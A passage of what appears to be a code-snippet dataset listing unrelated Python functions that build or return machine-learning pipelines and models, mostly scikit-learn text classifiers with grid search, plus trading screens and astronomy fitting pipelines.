data_name == 'GSE34248':\n pipeline = PL.make_pipeline(E.RandomForestClassifier(bootstrap=True, criterion=\"entropy\", max_features=0.9000000000000001, min_samples_leaf=3,\n min_samples_split=6, n_estimators=100))\n elif data_name == 'GSE41662':\n pipeline = PL.make_pipeline(svm.LinearSVC(C=0.001, dual=True, loss=\"hinge\", penalty=\"l2\", tol=0.01))\n elif data_name == 'GSE78097':\n pipeline = PL.make_pipeline(\n E.RandomForestClassifier(bootstrap=False, criterion=\"gini\", max_features=1.0, min_samples_leaf=4,\n min_samples_split=10, n_estimators=100))\n elif data_name == 'GSE36842':\n raise NotImplementedError()\n else:\n raise NotImplementedError('No pipeline is created for this data set')\n\n return pipeline", "def make_pipeline():\r\n\r\n mkt_cap_screen = (morningstar.valuation.market_cap.latest > 1e9)\r\n\r\n return Pipeline(\r\n columns={\r\n 'Free Cash Flow': morningstar.cash_flow_statement.free_cash_flow.latest,\r\n }, screen=mkt_cap_screen)", "def create_pipeline(clf):\n return Pipeline([('scaler', MinMaxScaler()), ('clf', clf)])", "def build_svm_pipeline():\n svm_pipeline = None\n\n svm_pipeline = Pipeline([\n ('vect', CountVectorizer()),\n ('clf', SGDClassifier()),\n ])\n\n return svm_pipeline", "def build_model():\n pipeline = Pipeline(\n [\n (\"vect\", CountVectorizer(tokenizer=tokenize)),\n (\"tfidf\", TfidfTransformer()),\n (\"clf\", MultiOutputClassifier(LinearSVC(dual=False))),\n ]\n )\n\n # use grid search to optimize the pipeline parameters\n parameters = {\"tfidf__use_idf\": (True, False), \"clf__estimator__C\": [1, 100]}\n cv = GridSearchCV(pipeline, param_grid=parameters)\n\n return cv", "def build_model():\n \n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize, max_df = 0.75, max_features = 5000, ngram_range = (1, 2))),\n ('tfidf', TfidfTransformer(use_idf = True)),\n ('clf', MultiOutputClassifier(estimator=RandomForestClassifier(n_estimators = 200, min_samples_split = 2)))\n ])\n \n return pipeline", "def make_pipeline(slam, settings):\n\n pipeline_name = \"pipeline_source[inversion]\"\n\n \"\"\"\n This pipeline is tagged according to whether:\n\n 1) Hyper-fitting settings (galaxies, sky, background noise) are used.\n 2) The lens galaxy mass model includes an `ExternalShear`.\n 3) The `Pixelization` and `Regularization` scheme of the pipeline (fitted in phases 3 & 4).\n \"\"\"\n\n path_prefix = f\"{slam.path_prefix}/{pipeline_name}/{slam.source_inversion_tag}\"\n\n \"\"\"\n Phase 1: Fit the `Pixelization` and `Regularization`, where we:\n\n 1) Fix the lens mass model to the `MassProfile`'s inferred by the previous pipeline.\n \"\"\"\n\n phase1 = al.PhaseImaging(\n search=af.DynestyStatic(\n name=\"phase[1]_mass[fixed]_source[inversion_magnification_initialization]\",\n n_live_points=30,\n ),\n galaxies=dict(\n lens=al.GalaxyModel(\n redshift=slam.redshift_lens,\n mass=af.last.instance.galaxies.lens.mass,\n shear=af.last.instance.galaxies.lens.shear,\n hyper_galaxy=af.last.hyper_combined.instance.optional.galaxies.lens.hyper_galaxy,\n ),\n source=al.GalaxyModel(\n redshift=slam.redshift_source,\n pixelization=al.pix.VoronoiMagnification,\n regularization=al.reg.Constant,\n hyper_galaxy=af.last.hyper_combined.instance.optional.galaxies.source.hyper_galaxy,\n ),\n ),\n hyper_image_sky=af.last.hyper_combined.instance.optional.hyper_image_sky,\n hyper_background_noise=af.last.hyper_combined.instance.optional.hyper_background_noise,\n settings=settings,\n )\n\n phase1 = phase1.extend_with_multiple_hyper_phases(\n setup_hyper=slam.setup_hyper, include_inversion=False\n )\n\n \"\"\"\n Phase 2: Fit the lens`s mass and source galaxy using the magnification `Inversion`, where we:\n\n 1) Fix the source `Inversion` parameters to the results of phase 1.\n 2) Set priors on the lens galaxy `MassProfile`'s using the results of the previous pipeline.\n \"\"\"\n\n phase2 = al.PhaseImaging(\n search=af.DynestyStatic(\n name=\"phase[2]_mass[total]_source[fixed]\", n_live_points=50\n ),\n galaxies=dict(\n lens=al.GalaxyModel(\n redshift=slam.redshift_lens,\n mass=af.last[-1].model.galaxies.lens.mass,\n shear=af.last[-1].model.galaxies.lens.shear,\n ),\n source=al.GalaxyModel(\n redshift=slam.redshift_source,\n pixelization=phase1.result.instance.galaxies.source.pixelization,\n regularization=phase1.result.instance.galaxies.source.regularization,\n hyper_galaxy=phase1.result.hyper_combined.instance.optional.galaxies.source.hyper_galaxy,\n ),\n ),\n hyper_image_sky=phase1.result.hyper_combined.instance.optional.hyper_image_sky,\n hyper_background_noise=phase1.result.hyper_combined.instance.optional.hyper_background_noise,\n settings=settings,\n )\n\n phase2 = phase2.extend_with_multiple_hyper_phases(\n setup_hyper=slam.setup_hyper, include_inversion=False\n )\n\n \"\"\"\n Phase 3: fit the input pipeline `Pixelization` & `Regularization`, where we:\n\n 1) Fix the lens `MassProfile` to the result of phase 2.\n \"\"\"\n\n phase3 = al.PhaseImaging(\n search=af.DynestyStatic(\n name=\"phase[3]_mass[fixed]_source[inversion_initialization]\",\n n_live_points=30,\n evidence_tolerance=slam.setup_hyper.evidence_tolerance,\n sample=\"rstagger\",\n ),\n galaxies=dict(\n lens=al.GalaxyModel(\n redshift=slam.redshift_lens,\n mass=phase2.result.instance.galaxies.lens.mass,\n shear=phase2.result.instance.galaxies.lens.shear,\n ),\n source=al.GalaxyModel(\n redshift=slam.redshift_source,\n pixelization=slam.pipeline_source_inversion.setup_source.pixelization_prior_model,\n regularization=slam.pipeline_source_inversion.setup_source.regularization_prior_model,\n hyper_galaxy=phase2.result.hyper_combined.instance.optional.galaxies.source.hyper_galaxy,\n ),\n ),\n hyper_image_sky=phase2.result.hyper_combined.instance.optional.hyper_image_sky,\n hyper_background_noise=phase2.result.hyper_combined.instance.optional.hyper_background_noise,\n settings=settings,\n )\n\n phase3 = phase3.extend_with_multiple_hyper_phases(\n setup_hyper=slam.setup_hyper, include_inversion=False\n )\n\n \"\"\"\n Phase 4: fit the lens`s mass using the input pipeline `Pixelization` & `Regularization`, where we:\n\n 1) Fix the source `Inversion` parameters to the results of phase 3.\n 2) Set priors on the lens galaxy `MassProfile`'s using the results of phase 2.\n \"\"\"\n\n mass = slam.pipeline_source_parametric.setup_mass.mass_prior_model_with_updated_priors(\n index=-1, unfix_mass_centre=True\n )\n\n phase4 = al.PhaseImaging(\n search=af.DynestyStatic(\n name=\"phase[4]_mass[total]_source[fixed]\", n_live_points=50\n ),\n galaxies=dict(\n lens=al.GalaxyModel(\n redshift=slam.redshift_lens,\n mass=mass,\n shear=phase2.result.model.galaxies.lens.shear,\n ),\n source=al.GalaxyModel(\n redshift=slam.redshift_source,\n pixelization=phase3.result.instance.galaxies.source.pixelization,\n regularization=phase3.result.instance.galaxies.source.regularization,\n hyper_galaxy=phase3.result.hyper_combined.instance.optional.galaxies.source.hyper_galaxy,\n ),\n ),\n hyper_image_sky=phase3.result.hyper_combined.instance.optional.hyper_image_sky,\n hyper_background_noise=phase3.result.hyper_combined.instance.optional.hyper_background_noise,\n settings=settings,\n )\n\n phase4 = phase4.extend_with_multiple_hyper_phases(\n setup_hyper=slam.setup_hyper, include_inversion=True\n )\n\n return al.PipelineDataset(\n pipeline_name, path_prefix, phase1, phase2, phase3, phase4\n )", "def read(cls):\n return PipelineJavaMLReader(cls, \"com.ibm.analytics.wml.pipeline.spark.MLPipelineModel\")", "def build_model(self) -> Pipeline:\r\n clf = RandomForestClassifier(\r\n n_estimators=200,\r\n max_features='auto',\r\n min_samples_leaf=1,\r\n min_samples_split=3,\r\n random_state=42, \r\n n_jobs=-1)\r\n model = MultiOutputClassifier(clf)\r\n \r\n pipeline = Pipeline([\r\n ('features', FeatureUnion(\r\n [('text', Pipeline(\r\n [('text_field_extractor', \r\n basic_utils.TextFieldExtractor('message')), \r\n ('tfidf', \r\n TfidfVectorizer(tokenizer=basic_utils.tokenize, \r\n min_df=.0025, max_df=0.5, ngram_range=(1,2)))\r\n ])),\r\n ('numerics', FeatureUnion(\r\n [('text_len', \r\n Pipeline([('text_len_extractor', \r\n basic_utils.NumericFieldExtractor('text_len')), \r\n ('text_len_scaler', StandardScaler())\r\n ])),\r\n ('punt_perc', \r\n Pipeline([('punt_perc_extractor', \r\n basic_utils.NumericFieldExtractor('punt_perc')), \r\n ('punt_perc_scaler', StandardScaler())\r\n ]))\r\n ])),\r\n ('starting_verb', basic_utils.PosFieldExtractor('starting_verb_flag'))\r\n ])),\r\n ('clf', model)\r\n ])\r\n \r\n return pipeline", "def build_model():\n \n #english trained optimized pipeline for word embedding\n nlp = spacy.load(\"en_core_web_md\") # this model will give you 300D\n \n pipeline = Pipeline([\n ('features', FeatureUnion([\n ('text_pipeline', Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ])),\n \n ('embeddings_pipeline', Pipeline([\n ('vect_trans',SpacyVectorTransformer(nlp)),\n ('reduce_dim', TruncatedSVD(50)),\n ])),\n \n ])),\n \n ('clf', MultiOutputClassifier(RandomForestClassifier()))\n ])\n \n parameters = {\n 'features__text_pipeline__vect__max_df': (0.5, 0.75, 1.0),\n 'features__embeddings_pipeline__reduce_dim__n_components':(50,60,70,100,120,130,150)\n }\n cv = GridSearchCV(pipeline, param_grid=parameters,cv=2)\n \n return cv", "def get_model():\n model = ecole.scip.Model.from_file(str(DATA_DIR / \"bppc8-02.mps\"))\n model.disable_cuts()\n model.disable_presolve()\n model.set_param(\"randomization/permuteconss\", True)\n model.set_param(\"randomization/permutevars\", True)\n model.set_param(\"randomization/permutationseed\", 784)\n model.set_param(\"randomization/randomseedshift\", 784)\n model.set_param(\"randomization/lpseed\", 784)\n return model", "def build_model():\n pipeline = Pipeline([\n ('features', FeatureUnion([\n \n ('text_pipeline', Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer())\n ])),\n\n ('starting_verb', StartingVerbExtractor())\n ])),\n \n ('clf', MultiOutputClassifier(AdaBoostClassifier()))\n ])\n\n # specify parameters for grid search\n parameters = {\n 'clf__estimator__n_estimators': [50],\n 'clf__estimator__learning_rate': [1]\n }\n\n # create grid search object\n cv = GridSearchCV(pipeline, param_grid=parameters)\n \n return cv", "def build_model():\n \n pipeline = Pipeline([\n ('features', FeatureUnion([\n\n ('text_pipeline', Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer())\n ])),\n\n ('starting_verb', StartingVerbExtractor())\n ])),\n\n ('clf', MultiOutputClassifier(AdaBoostClassifier()))\n])\n \n # specify parameters for grid search\n parameters = {\n 'features__text_pipeline__vect__ngram_range': ((1, 1), (1, 2)),\n 'features__text_pipeline__vect__max_df': (0.75, 1.0)\n }\n\n # create grid search object\n cv = GridSearchCV(pipeline, param_grid = parameters, n_jobs= 8, cv = 3, verbose = 2)\n\n return cv", "def load_pipeline():\n\n try:\n logging.info(\"Loading the fitted pipeline...\")\n with open(base.SAVED_MODEL_PATH, \"rb\") as model_file:\n pipeline = pickle.load(model_file)\n logging.info(\"Loading completed successfully...\")\n except FileNotFoundError:\n logging.error(\"Model file has not been found.\")\n raise\n return pipeline", "def model(self):\n\n # write summaries\n\n i = keras.Input(self.s)\n\n\n return keras.Model(inputs=[i], outputs=self.call(i))", "def model(self):\n\n # write summaries\n\n i = keras.Input(self.s)\n\n\n return keras.Model(inputs=[i], outputs=self.call(i))", "def build_model(cls, args):\n base_architecture(args) \n return StyleGANGeneratorPretrain(args)", "def buildModel( self, transformer, classifier ):\n summitAIModel = make_pipeline ( transformer , classifier )\n summitAIModel.fit ( self.X , self.y )\n joblib.dump ( summitAIModel , self.modeldump )", "def fill_pipeline():\n\n # m1_pca = PCA()\n m1_pca = PCA(svd_solver='randomized', whiten=True) # 与官网里子一致的后2个参数,否则分数很差\n # m1_pca.fit(X_train)\n\n m2_svc = SVC(kernel='rbf', class_weight='balanced')\n\n pipe = Pipeline(steps=[('pca', m1_pca),\n ('svc', m2_svc)])\n print('\\n===================原 estimator')\n pprint(pipe.named_steps)\n return pipe", "def build_model():\n pipeline = Pipeline([\n ('features', FeatureUnion([\n\n ('text_pipeline', Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer())\n ])),\n ('starting_verb', StartingVerbExtractor())\n ])),\n ('clf', DecisionTreeClassifier())\n ])\n\n parameters = [\n {\n 'features__text_pipeline__vect__max_df': (0.5, 1.0),\n 'features__text_pipeline__vect__min_df': (1, 0.01),\n 'features__text_pipeline__vect__max_features': (None, 5000),\n 'features__text_pipeline__tfidf__use_idf': (True, False),\n 'clf': (DecisionTreeClassifier(min_samples_split=3),),\n 'clf__max_depth': (None, 4)\n }, {\n 'features__text_pipeline__vect__max_df': (0.5, 1.0),\n 'features__text_pipeline__vect__min_df': (1, 0.01),\n 'features__text_pipeline__vect__max_features': (None, 5000),\n 'features__text_pipeline__tfidf__use_idf': (True, False),\n 'clf': (MultiOutputClassifier(LinearSVC(multi_class='ovr')),)\n }, {\n 'features__text_pipeline__vect__max_df': (0.5, 1.0),\n 'features__text_pipeline__vect__min_df': (1, 0.01),\n 'features__text_pipeline__vect__max_features': (None, 5000),\n 'features__text_pipeline__tfidf__use_idf': (True, False),\n 'clf': (MLPClassifier(),),\n 'clf__hidden_layer_sizes': ((100, 10), (50,), (50, 10))\n }\n ]\n\n cv = GridSearchCV(pipeline, parameters, cv=3, n_jobs=4, verbose=10)\n \n return cv", "def model(self):\n i = self.keras.Input(self.s)\n\n return keras.Model(inputs=[i], outputs=self.call(i))", "def make_pipeline(context):\n \n # Base universe of top 500 US stocks.\n base_universe_filter = Q500US()\n\n # Stocks of only tech sector.\n tech_sector = Sector(mask=base_universe_filter)\n tech_universe_filter = base_universe_filter & tech_sector.eq(311)\n\n # Top 10 tech stocks with largest market cap.\n mkt_cap_filter = morningstar.valuation.market_cap.latest\n top_mkt_cap_tech_filter = mkt_cap_filter.top(context.NUM_SYMBOLS, mask=tech_universe_filter)\n\n # Bollinger band factor with Stdev factor 2.\n lower_band_factor, middle_factor, upper_band_factor = BollingerBands(window_length=22, k=2, mask=top_mkt_cap_tech_filter)\n\n # Percent difference between (price, lower_band) and (price, upper_band).\n price = USEquityPricing.close.latest\n buy_percent_factor = ((lower_band_factor - price)*100)/price\n sell_percent_factor = ((price - upper_band_factor)*100)/price\n\n # Mean reversion buy and sell filters.\n # Sell when price exceeds upper-band and buy when price is below lower-band.\n buy_filter = buy_percent_factor > 0\n sell_filter = sell_percent_factor > 0\n\n # Build and return the Pipeline.\n pipe_bbands = Pipeline(columns={'buy_percent': buy_percent_factor,\n 'lower_band': lower_band_factor,\n 'buy': buy_filter,\n 'price': price,\n 'sell': sell_filter,\n 'upper_band': upper_band_factor,\n 'sell_percent': sell_percent_factor}, screen=top_mkt_cap_tech_filter)\n \n return pipe_bbands", "def build_model():\n\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(DecisionTreeClassifier()))\n ])\n\n \n parameters = {'clf__estimator__min_samples_split':[2, 4, 6],\n 'clf__estimator__max_depth': [2, 4]}\n\n #parameters = {'clf__estimator__min_samples_split':[2]}\n cv = GridSearchCV(pipeline, parameters)\n\n return(cv)", "def create_pipeline(path):\n\n pipeline = import_file(path)\n # Perform Wigner-Seitz analysis:\n ws = WignerSeitzAnalysisModifier(\n output_displaced=False, # Output sites\n per_type_occupancies=True, # Output occupancies per atom type\n affine_mapping=ReferenceConfigurationModifier.AffineMapping.ToReference)\n pipeline.modifiers.append(ws)\n # Calculate total and elementwise occupancies\n pipeline.modifiers.append(total_occupancy_modifier)\n # Select all defect sites\n pipeline.modifiers.append(select_defects_modifier)\n # Delete all non-defect sites\n pipeline.modifiers.append(InvertSelectionModifier())\n pipeline.modifiers.append(DeleteSelectedModifier())\n # Find defect clusters\n pipeline.modifiers.append(ClusterAnalysisModifier(\n cutoff=CLUSTER_CUTOFF,\n sort_by_size=False))\n # Classify defect clusters\n pipeline.modifiers.append(classify_defect_clusters_modifier)\n\n return pipeline", "def model(x):\n SS = SugarscapeCg(max_metabolism=x['metab'], max_vision=x['vision'])\n SS.verbose = False\n y = SS.run_model(step_count=30)\n return {'y': y}", "def get_non_refinement_pipeline():\n node_scaling = PrimaryNode('scaling')\n node_rf = SecondaryNode('rf', nodes_from=[node_scaling])\n node_logit = SecondaryNode('logit', nodes_from=[node_scaling])\n node_xgboost = SecondaryNode('xgboost', nodes_from=[node_logit, node_rf])\n pipeline = Pipeline(node_xgboost)\n return pipeline", "def get_model_from_dict(model_dict):\n\n pipe_list = []\n\n if 'transforms' in model_dict:\n # For basic scikit-learn transforms\n transforms = model_dict['transforms'].copy()\n if 'scaler' in transforms:\n scaler = transforms.pop('scaler')\n pipe_list.append(get_scaler(scaler))\n if 'pca' in transforms:\n transforms.pop('pca')\n pipe_list.append(get_pca())\n if 'poly' in transforms:\n args = transforms.pop('poly')\n pipe_list.append(get_poly(args))\n if len(transforms) > 0:\n raise Exception(\"unknown transforms: %s\" % repr(transforms))\n\n if 'args' in model_dict:\n model = get_model_class(model_dict['class'], model_dict['args'])\n else:\n model = get_model_class(model_dict['class'])\n\n if 'clusterregression' in model_dict:\n from empirical_lsm.clusterregression import ModelByCluster\n clusterer = model_dict['clusterregression']['class']\n cluster_args = model_dict['clusterregression']['args']\n model = ModelByCluster(\n get_clusterer(clusterer, cluster_args),\n model)\n\n pipe_list.append(model)\n\n pipe = make_pipeline(*pipe_list)\n\n if 'lag' in model_dict:\n params = model_dict['lag']\n pipe = get_lagger(pipe, params)\n elif 'markov' in model_dict:\n params = model_dict['markov']\n pipe = get_markov_wrapper(pipe, params)\n\n if 'forcing_vars' in model_dict:\n pipe.forcing_vars = model_dict['forcing_vars']\n else:\n logger.warning(\"Warning: no forcing vars, using defaults (all)\")\n pipe.forcing_vars = get_config(['vars', 'met'])\n\n if 'description' in model_dict:\n pipe.description = model_dict['description']\n\n return pipe", "def build(X, y=None):\n model = Pipeline([\n ('preprocessor',NLTKPreprocessor()),\n ('vectorizer', CountVectorizer()),\n ('tfidf', TfidfTransformer()),\n ('clf', OneVsRestClassifier(LinearSVC(C=0.9)))])\n\n model.fit(X, y)\n return model", "def model(self):\n return _model_from_quantity(self._sliced_components, mesh=self.mesh)", "def build_model(self):\n pipeline = Pipeline([\n ('vec', CountVectorizer(tokenizer=self.tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier()))\n ])\n self.model = pipeline\n return pipeline", "def get_refinement_pipeline():\n node_scaling = PrimaryNode('scaling')\n node_logit = SecondaryNode('logit', nodes_from=[node_scaling])\n node_decompose = SecondaryNode('class_decompose', nodes_from=[node_logit, node_scaling])\n node_rfr = SecondaryNode('rfr', nodes_from=[node_decompose])\n node_xgboost = SecondaryNode('xgboost', nodes_from=[node_rfr, node_logit])\n\n pipeline = Pipeline(node_xgboost)\n return pipeline", "def get_preprocessing_pipeline(x):\n\n x = keras.layers.Cropping2D(cropping=((50, 20), (0, 0)))(x)\n\n # Poor man's resize, since using\n # x = keras.layers.Lambda(lambda data: tf.image.resize_images(data, size=(45, 160)))(x)\n # fails on model load...\n x = keras.layers.AveragePooling2D(pool_size=(2, 2))(x)\n x = keras.layers.Lambda(lambda data: data / 255)(x)\n\n return x", "def pipeline(self):\n # gotta avoid circular imports by deferring\n from .pipeline import Pipeline\n return Pipeline().from_source(self._collection)", "def pipeline(self) -> Pipeline:\n if self._to_pipeline is None:\n raise AttributeError(\n \"pipeline not available because `to_pipeline` was not set on __init__.\"\n )\n return self._to_pipeline(self)", "def create_pipeline_for_kfold(self, args):\n return ClassificationPipeline(args=args)", "def make_pipeline():\n \n # Base universe set to the QTradableStocksUS\n base_universe = QTradableStocksUS()#Q500US()\n base_universe = (base_universe & Q500US())\n base_universe = (base_universe & Fundamentals.market_cap.latest.top(150))\n \n # Factor of yesterday's close price.\n #yesterday_close = USEquityPricing.close.latest\n \n pipe = Pipeline(\n columns={\n #'close': yesterday_close,\n 'sector': Sector(),\n },\n screen=base_universe\n )\n return pipe", "def get_pipeline(features, to_matrix=True):\n feature_names = []\n for feature in features:\n feature_names += feature[1].FEATS\n if to_matrix:\n return Pipeline(features + [('transform', ToMatrix(features=feature_names)), ('norm', MinMaxScaler())])\n else:\n return Pipeline(features)", "def make_pipeline(sec_list, context):\n\n # Return Factors\n mask = SecurityInList()\n mask.securities = sec_list\n mask = mask.eq(1)\n yr_returns = Returns(window_length=context.return_period, mask=mask)\n sharpe = SharpeRatio(inputs=[yr_returns], window_length=context.return_period, mask=mask)\n\n pipe = Pipeline(\n screen=mask,\n columns={\n 'yr_returns': yr_returns, 'sharpe': sharpe\n }\n )\n return pipe", "def model(self):\n return self._fit_model()", "def pipeline(self):\n return self._pipeline", "def pipeline(self):\n return self._pipeline", "def build_model ( self, transformer, classifier, dumpfile ) :\n summitAIModel = make_pipeline ( transformer , classifier )\n summitAIModel.fit ( self.X , self.y )\n joblib.dump ( summitAIModel , dumpfile )", "def pipeline(args) :\n from pipeliner import create_pipeline\n create_pipeline(args)", "def build_pipeline():\n full_df = pd.read_csv(\"../data/healthcare-dataset-stroke-data.csv\",index_col = \"id\").drop(columns = [\"stroke\"],axis=1)\n #transform functions to make the pipeline work\n one_hot_encode_transformed = FunctionTransformer(one_hot_encode)\n impute_transformed = FunctionTransformer(impute)\n add_bodytype_transformed = FunctionTransformer(add_bodytype)\n add_diabetes_transformed = FunctionTransformer(add_diabetes)\n add_preexisting_transformed = FunctionTransformer(add_preexisting)\n add_missing_cols_transformed = FunctionTransformer(add_missing_cols,kw_args={\"total_tags\":get_all_tags(full_df)})\n pipeline = Pipeline([\n\n \n (\"add_bodytype\",add_bodytype_transformed),\n (\"add_diabetes\",add_diabetes_transformed),\n (\"add_preexisting\",add_preexisting_transformed),\n (\"impute\",impute_transformed),\n (\"one_hot_encode\",one_hot_encode_transformed),\n (\"add_missing_cols\",add_missing_cols_transformed),\n #use all available threads\n (\"over_under\" , SMOTEENN()),\n (\"pred\",XGBClassifier(nthread = -1,verbosity = 0,tree_method = 'gpu_hist',eval_metric = \"aucpr\",sampling_method = \"gradient_based\"))\n ])\n \n #set up parameters to test\n parameters = {\n\n 'pred__scale_pos_weight' : list(range(1,60,5)),\n 'over_under__sampling_strategy' : ['auto',0.1,0.2,0.3,0.4,0.5],\n \"pred__max_delta_step\": list(range(0,11))\n \n } \n \n grid = GridSearchCV(pipeline, param_grid=parameters,n_jobs = -1 ,scoring =\"average_precision\",verbose = 1)\n\n return grid", "def get_model(parameters):\n if MODEL == 6:\n return get_model_6(parameters)\n elif MODEL == 5:\n return get_model_5(parameters)\n elif MODEL == 4:\n return get_model_4(parameters)\n elif MODEL == 3:\n if CROSS_VALIDATION:\n return get_cv_model_3(parameters)\n else:\n return get_model_3(parameters)\n elif MODEL == 2:\n return get_model_2(parameters)\n else:\n return get_model_1(parameters)", "def build_model():\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier()))\n ])\n \n parameters = {'clf__estimator__n_estimators': [50, 100],\n 'clf__estimator__min_samples_split': [2, 3, 5],\n 'clf__estimator__criterion': ['entropy', 'gini']\n }\n \n cv = GridSearchCV(pipeline, param_grid=parameters)\n \n return cv", "def _get_pipeline(self, conf: Optional[float] = None, fuse_model: bool = True) -> PoseEstimationPipeline:\n if None in (self._edge_links, self._image_processor, self._default_nms_conf):\n raise RuntimeError(\n \"You must set the dataset processing parameters before calling predict.\\n\" \"Please call `model.set_dataset_processing_params(...)` first.\"\n )\n\n conf = conf or self._default_nms_conf\n\n if len(self._keypoint_colors) != self.num_joints:\n raise RuntimeError(\n \"The number of colors for the keypoints ({}) does not match the number of joints ({})\".format(len(self._keypoint_colors), self.num_joints)\n )\n if len(self._edge_colors) != len(self._edge_links):\n raise RuntimeError(\n \"The number of colors for the joints ({}) does not match the number of joint links ({})\".format(len(self._edge_colors), len(self._edge_links))\n )\n\n pipeline = PoseEstimationPipeline(\n model=self,\n image_processor=self._image_processor,\n edge_links=self._edge_links,\n edge_colors=self._edge_colors,\n keypoint_colors=self._keypoint_colors,\n post_prediction_callback=self.get_post_prediction_callback(conf=conf),\n fuse_model=fuse_model,\n )\n return pipeline", "def pipeline(self):\n return stanza.Pipeline(dir=TEST_MODELS_DIR, processors=\"tokenize,ner\")", "def to_sklearn(self):\n import sklearn.pipeline as skp\n\n steps = []\n for step in self.steps:\n steps += [(step[0], step[1].to_sklearn())]\n return skp.Pipeline(steps)", "def auto_ml():\r\n # Reading from file\r\n my_data = my_reader(config.filename, separ=config.file_separ)\r\n\r\n # Binary and Unary columns search\r\n is_binary_list = is_binary(my_data)\r\n is_unary_list = is_unary(my_data)\r\n\r\n # Time columns search\r\n is_time_list = is_time(my_data)\r\n\r\n # To dummy\r\n my_data = to_dummies(my_data)\r\n\r\n # Train-test split\r\n train_df, test_df = \\\r\n my_train_test_split(my_data, act_test_size=config.test_size)\r\n\r\n # Pure numbers will be the input variables\r\n input_vars = to_pure_numbers(my_data)\r\n\r\n # Choosing if it is a regression or classification\r\n global regression, classification\r\n regression, classification = guess_goal(my_data, config.target)\r\n\r\n # Modelling and building the pipeline\r\n n_neighbors = 15\r\n x_df = train_df[input_vars]\r\n if regression:\r\n pipe_1 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', LinearRegression(fit_intercept=True))])\r\n pipe_2 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model',\r\n neighbors.KNeighborsRegressor(n_neighbors,\r\n weights='distance'))])\r\n pipe_3 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', linear_model.BayesianRidge())])\r\n pipe_4 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', linear_model.SGDRegressor())])\r\n pipe_5 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', linear_model.ElasticNet())])\r\n pipe_6 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', linear_model.Ridge())])\r\n pipe_7 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', linear_model.Lasso())])\r\n pipe_8 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', RandomForestRegressor(max_depth=2,\r\n random_state=0,\r\n n_estimators=100))])\r\n pipe_dict = {0: 'LinearRegression',\r\n 1: 'KNeighborsRegressor',\r\n 2: 'BayesianRidge',\r\n 3: 'SGDRegressor',\r\n 4: 'ElasticNet',\r\n 5: 'Ridge',\r\n 6: 'Lasso',\r\n 7: 'RandomForestRegressor'}\r\n\r\n if classification:\r\n pipe_1 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', LogisticRegression(random_state=42))])\r\n pipe_2 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model',\r\n neighbors.KNeighborsClassifier(n_neighbors))])\r\n pipe_3 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', RandomForestClassifier(n_estimators=100,\r\n max_depth=2,\r\n random_state=0))])\r\n pipe_4 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', linear_model.SGDClassifier())])\r\n pipe_5 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', MLPClassifier())])\r\n pipe_6 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', GradientBoostingClassifier())])\r\n pipe_7 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', 